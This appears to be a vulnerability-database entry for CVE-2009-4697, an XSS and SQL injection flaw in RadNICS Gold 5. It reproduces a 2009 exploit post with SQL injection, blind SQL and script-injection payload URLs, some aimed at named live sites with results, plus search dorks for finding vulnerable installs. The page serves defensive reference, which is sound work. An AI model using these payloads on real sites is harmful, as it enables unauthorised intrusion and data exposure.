CVE-2009-4697
Description
Multiple cross-site scripting (XSS) vulnerabilities in index.php in RadNICS Gold 5 allow remote attackers to inject arbitrary web script or HTML via the (1) order parameter in a ulist action and the (2) fid parameter in a view_forum action.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
radnics gold 5.0 - Multiple Vulnerabilities
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[»] RadNICS Gold v5 Multiple Remote Vulnerabilities
==============================================================================
[»] Script: [ RadNICS Gold v5 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.radscripts.com/php-scripts/domain_name_software_auctions/gold_features_admin.php ]
[»] Founder: [ Moudi <m0udi@9.cn> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[»] Team: [ EvilWay ]
[»] Dork: [ Content Copyright © 2007 RadNics Gold ]
[»] Dork2: [ Powered by: RadNICS Gold v5 ]
[»] Price: [ $199 ]
[»] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit + LIVE : SQL INJECTION vulnerability ]===
[»] http://www.site.com/patch/index.php?a=view_forum&fid=[SQL]
[»] http://www.radnics.com/v5/052107/index.php?a=view_forum&fid=null+union+select+1,2,version(),4,5--&admin=0
[»] http://dottvauction.com/index.php?a=view_forum&fid=null+union+select+1,2,version(),4,5--&admin=0
RESULT : 5.0.67-community
===[ Exploit + LIVE : BLIND SQL vulnerability ]===
[»] http://www.site.com/patch/index.php?a=view_forum&fid=[BLIND]
[»] http://www.radnics.com/v5/052107/index.php?a=view_forum&fid=1%20AND%20SUBSTRING(@@version,1,1)=5&admin=0 TRUE
http://www.radnics.com/v5/052107/index.php?a=view_forum&fid=1%20AND%20SUBSTRING(@@version,1,1)=4&admin=0 FALSE
SO MYSQL: V5
===[ Exploit XSS + LIVE : vulnerability ]===
[»] http://www.site.com/patch/index.php?a=ulist&mode=9&order=[XSS]&cat=1
[»] http://www.site.com/patch/index.php?a=view_forum&fid=[XSS]&admin=0
[»] http://www.radnics.com/v5/052107/index.php?a=ulist&mode=9&order=1>'><ScRiPt %0A%0D>alert(640795682719)%3B</ScRiPt>&cat=1
[»] http://www.radnics.com/v5/052107/index.php?a=view_forum&fid=1>'><ScRiPt %0A%0D>alert(664745745195)%3B</ScRiPt>&admin=0
Author: Moudi
###########################################################################
# milw0rm.com [2009-07-17]
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| radscripts | radnics | 5 | |
References
- http://secunia.com/advisories/35846
- http://www.exploit-db.com/exploits/9196
- http://www.osvdb.org/55951
- http://www.securityfocus.com/bid/35730
- https://exchange.xforce.ibmcloud.com/vulnerabilities/51841
- http://secunia.com/advisories/35846
- http://www.exploit-db.com/exploits/9196
- http://www.osvdb.org/55951
- http://www.securityfocus.com/bid/35730
- https://exchange.xforce.ibmcloud.com/vulnerabilities/51841
CWEs
CWE-79
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.